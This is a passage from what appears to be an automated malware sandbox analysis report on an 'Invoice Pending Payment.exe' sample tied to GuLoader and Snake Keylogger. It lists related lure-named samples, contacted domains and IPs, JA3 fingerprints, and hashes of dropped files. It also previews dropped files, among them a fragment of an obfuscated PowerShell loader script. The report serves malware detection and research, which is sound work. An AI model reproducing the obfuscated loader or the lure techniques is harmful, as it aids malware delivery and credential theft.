	PO# ENQ8864.Pdf.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Commercial Invoice-011212250.vbs	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	AWB_3570456515#U00b7PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	Swift Copy_19.02.2025.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	rfacturapendiente.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	proforma fatura No. 90273641836.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	DHl-Global-Documents.js	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	71Jx3gwamwuCIHy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	z35Payment-swift1039.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	CERENAK-8392.exe	Get hash	malicious	CryptOne, MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
checkip.dyndns.com	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	132.226.247.73
	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	71Jx3gwamwuCIHy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	z35Payment-swift1039.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	CERENAK-8392.exe	Get hash	malicious	CryptOne, MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
api.telegram.org	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipping doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipping Doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VGjI0Z6AiG.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	windowsupdate.exe.bin.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipping doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shipping Doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VGjI0Z6AiG.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	windowsupdate.exe.bin.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
ORACLE-BMC-31898US	71Jx3gwamwuCIHy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	z35Payment-swift1039.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	CERENAK-8392.exe	Get hash	malicious	CryptOne, MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Shipping doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Shipping Doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	BL7257139040.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	SecuriteInfo.com.Variant.Genie.8DN.16.13849.30802.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
CLOUDFLARENETUS	4338471.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://qq51f.short.gy/1	Get hash	malicious	Unknown	Browse	172.67.178.15
	https://www.mediafire.com/file_premium/gvsjycs9mnhqpli/Tristan_Cardinal_Proposal.pdf/file	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://t.salesmatemail.net/email/v1/track?key=4788dfbd-ffb2-4c0e-b7b1-b1e698ca06aa	Get hash	malicious	Unknown	Browse	104.21.27.152
	EFT Remittance_(Mmannix)CQDM.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.17.25.14
	DocuFlex.exe.7z	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://github.com/obsidianmd/obsidian-releases/releases/download/v1.8.7/Obsidian-1.8.7.exe	Get hash	malicious	Unknown	Browse	104.26.1.147
	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	https://docu-flex.com/lpFlex.html?campaign_id=22214392559&adgroup_id=174081511105&placement_id=wakethekids.com&creative_id=732306932395&clc=EAIaIQobChMItaq03J3biwMVGNS4CB0jfxZmEAEYASAAEgJj6fD_BwE&gad_source=5&gclid=EAIaIQobChMItaq03J3biwMVGNS4CB0jfxZmEAEYASAAEgJj6fD_BwE	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://uhsee.com	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.32.1
	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	71Jx3gwamwuCIHy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	z35Payment-swift1039.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	CERENAK-8392.exe	Get hash	malicious	CryptOne, MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
3b5074b1b5d032e5620f69f9f700ff0e	http://37.221.67.207/bins/Hilix.mpsl	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	149.154.167.220
	pq.txt.ps1	Get hash	malicious	LummaC Stealer	Browse	149.154.167.220
	https://docu-flex.com/DocuFlex.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	http://lookerstudio%2e%67%6f%6f%67%6c%65%2e%63%6f%6d/s/ryl1d6fWDPQ	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	#U00c1raj#U00e1nlat_k#U00e9r#U00e9s.img.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://smart-redirect-solver.lovable.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1raj#U00e1nlat_k#U00e9r#U00e9s.img.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	Quote_7902132_Middle_East_02 pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	142.250.186.46 142.250.181.225
	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.46 142.250.181.225
	Payroll List_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.46 142.250.181.225
	Sipari#U015f Sorgulama N#U00ba TM05-Q2-24-25.Vbs.vbs	Get hash	malicious	Remcos	Browse	142.250.186.46 142.250.181.225
	rfacturaci__nsolicitado.com.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.46 142.250.181.225
	CERENAK-8392.exe	Get hash	malicious	CryptOne, MSIL Logger, MassLogger RAT	Browse	142.250.186.46 142.250.181.225
	Udrustningens70.exe	Get hash	malicious	GuLoader	Browse	142.250.186.46 142.250.181.225
	Filaree.exe	Get hash	malicious	GuLoader	Browse	142.250.186.46 142.250.181.225
	Udrustningens70.exe	Get hash	malicious	GuLoader	Browse	142.250.186.46 142.250.181.225
	SecuriteInfo.com.Win64.MalwareX-gen.21224.9521.dll	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.181.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	KWbWCYe6LB.exe	Get hash	malicious	GuLoader	Browse
	DOCU800147001.exe	Get hash	malicious	GuLoader	Browse
	#U8fdd#U89c4#U540d#U5355.exe	Get hash	malicious	Unknown	Browse
	hnTW5HdWvY.exe	Get hash	malicious	AgentTesla, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1p5oioe4.f3t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2a5x23d.um2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sigiarqw.z5h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2fifh0t.zww.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.028908901377071
Encrypted:	false
SSDEEP:	96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
MD5:	51E63A9C5D6D230EF1C421B2ECCD45DC
SHA1:	C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
SHA-256:	CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
SHA-512:	C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: PRUEBA 2.exe, Detection: malicious, Browse Filename: KWbWCYe6LB.exe, Detection: malicious, Browse Filename: DOCU800147001.exe, Detection: malicious, Browse Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious, Browse Filename: hnTW5HdWvY.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Brnaba.txt

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	Generic INItialization configuration [registrar aabredden]
Category:	dropped
Size (bytes):	357
Entropy (8bit):	4.322293998459369
Encrypted:	false
SSDEEP:	6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb
MD5:	ACED15FD55D311D663ECC7B5F386B8E2
SHA1:	A7F36FD33206209CB0E5E39643EC8C6773D5ED3B
SHA-256:	16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F
SHA-512:	7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3
Malicious:	false
Preview:	[bloodstained initialdeterminanten]..unprescinded produktionsforholds identific dysurias biblioteksbgernes textman kaldte spotlightet archearl,sofus unvessel souffleer cementblanders stoneweed rufe trningsdragternes genitivisk bartizaned....[registrar aabredden]..;teardowns batchkrselens unform gradgrind,eksekveringens afskrifters secretors printerporte..

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3143), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	60368
Entropy (8bit):	5.280991252251336
Encrypted:	false
SSDEEP:	1536:IuWZnBGyJTf6U1uxBx174Nsp/0PjUt5hYlH:ULvTf/1uHNcj6XYt
MD5:	798E71F2FB7AECCBF532D4B9C7484B56
SHA1:	D22784524AC6412395F51A3FD3FE0CFBA04F034C
SHA-256:	1669D04C0289873AA79409AC3522A90CE116740F52C11EB8833AAF5C8908ACB8
SHA-512:	29F868A51AC1B4C25A4A7D1FAD093E6FCCC3ADC762F8FA791C8E728AAF16A26CE0E43CDF45F955D0152D94CCFF514776426BFB9A088CEBF77EF9521A642606BF
Malicious:	false
Preview:	$Styningens=$Urlighedens;........$Habitudes = @'.Sprea.Vandg$DodoeGLibe nUnde oForeasEkatatProwli.raskkS rueeDandyr Nephe N.nmnDendrs Read=Proto$RenmoU trv nTrededAndreiLarg.sTemmeo AnthbP leoeT akeyPolypeHalvtd Auto;Komma.MyopifJingpuHujennBatracSkunktRheumiBaskeoO erlnDistr PerfeT owariEts.rc RoaduFalbynTvegeaTiggenArbej Basid( Smil$.okkaSAcciap MediiHuls.rKiggei odpotSwou uOpgavsFejribov.rdeN tras PhrekDs ghaBortetPereinBakunisenilnElusigprotoeTakkenManufsUnpar,s.ogh$Bi.esPMdedalAalekuBehavsHeterkKen avPy oma acetm Pl vpu impeScatbrOsteafD komeSub rkDav,ntsubpru SupimSkambmSvbere XenatFoelesIsabe)Dom.e ebel{ akhi.Taage.Woodw$ChemoS B fapCitrooBrneetCon,ep ChlorGrapiiHypassAscideSk ver BrnesCompe orbe(RegnsKunthouPr.cerSikkes Realu yldsBillapTol,alHovedaAsiarnLic,teFr nzrHjor.nUpwreeCouris Vand Misti'Mo.onOVenstv.rpineTankbrKval.l Hero$GlassUBlushnBllenm esos, KrontUngdySPakk B etsbeRemonv C lcgUddate Bogtp Lesq GifteaK aftcHexachLicheiA tifiUhyreLG nneaTegnkmPhra bRepli ForhurOe

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	507280
Entropy (8bit):	7.58580269013346
Encrypted:	false
SSDEEP:	12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
MD5:	E70E71A31781B44F850A39693784CE74
SHA1:	CE8CF2DC1B30D5D6870CC3D374C15E1005FDC879
SHA-256:	A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7
SHA-512:	2A7994CEC6638F7FF523358E7DF0BFDDAD0F2ABAEF89E598455E9F0B7A44009E139AC9F9AFD7AC38377ED302727C5C75322327B8FABF0B450835CDBB5C52A9A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@..........................................................................s.......`..P............................................................................p...............................text...jZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...P....`.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Unloveliest183.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 79x629, components 3
Category:	dropped
Size (bytes):	7357
Entropy (8bit):	7.91945978739656
Encrypted:	false
SSDEEP:	192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL
MD5:	F32B2F6007A74312B5F0CB1AA5B26680
SHA1:	BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3
SHA-256:	2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825
SHA-512:	EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......u.O.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J).8V.".. ..)...OQM......8P).sH..K.p...L...M..M..N..S.U......G.,..T.9....u4........H......R.LZ.U.X.E.....Gc.\|\.P.EI.sY.sh....QH..@.[.Q..#.z..R.9.ED.jQZ"Y".5.2...TT.c..T.1..+.....E.S.sR6.....).s.R.F.(.Q,.:..8..T..E... .PU..T3D8.tc.9W.O.~Q.RP...-5....IzT.Q..TV..L.1VTT1....Q...E.1S....4.c.SR..).?tj.).......8..Z....8."N-{T.$...R0.,.*......}.Q".>.Sq.

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Yderredens102.Kan

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	data
Category:	dropped
Size (bytes):	338276
Entropy (8bit):	7.671083634160716
Encrypted:	false
SSDEEP:	6144:WWxwim+hZhU4Cb/9U5usu4LX4Ev0P+sDBG6IzhV8ulhplMjNzxU9l:WWxrPhxY9su+IBGsDI9qEQxUH
MD5:	A4DD91D5ACFA3D8154510A16A27792DF
SHA1:	7F797BEECC8609A7B617A7CCD6BA8A335D475A47
SHA-256:	5AE90EE62220502C1041B177854398C94B9F42F6115CE6FCA120B7C0702C0286
SHA-512:	8F119081CF9625F036AC4783A7D127D25E8BF82BC6FEBE804EDAC2D18B71B9E85AB2C26CB04AA1A28A47CC1D49BD0676D486FEA917CA872B7C2E43A6AF889C07
Malicious:	false
Preview:	..........cc.11.:...................................................................;;....}}...........iiii...bbb.......E...............................R.......w..+........x.{{{.......................nn.......Z..............u..6...........................@........r.oo..................\|........L................W..""......................a.............. ...............eeee......m........555.....................................X........z......R.$.h...............................J...............................................N.......z...{......................y...........mm...................\|\|......//..YYYY..e.....d.j....................a..........o..............WW.//....WWW...sss.%%.'........?.......WWW...................................u.....eee............nn....mm...........ddd.....0............>>.............}}.\\.>>..........11...M.....bbbb..1.........................{.....'....FF...........................................t.........9.......j.............OO.......................k.

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\blinkenberg.txt

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	188
Entropy (8bit):	4.482002609682535
Encrypted:	false
SSDEEP:	3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn
MD5:	2B51E420AA9188A74DB9D853C1225B5C
SHA1:	B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164
SHA-256:	FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53
SHA-512:	574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6
Malicious:	false
Preview:	benittas thirstier inductometer.Halvlngde forlyder roth..Cicuta barbaren udsugningsanlggets,privatisere rationalizing protogyny udmntningsprofil gyrolith volkswagen..[tyndtarmes sstykke]..

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\fllesbrn.txt

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	Generic INItialization configuration [FJORTENAARSFDSELSDAGES UDSTDELSERNES]
Category:	dropped
Size (bytes):	279
Entropy (8bit):	4.994626166298632
Encrypted:	false
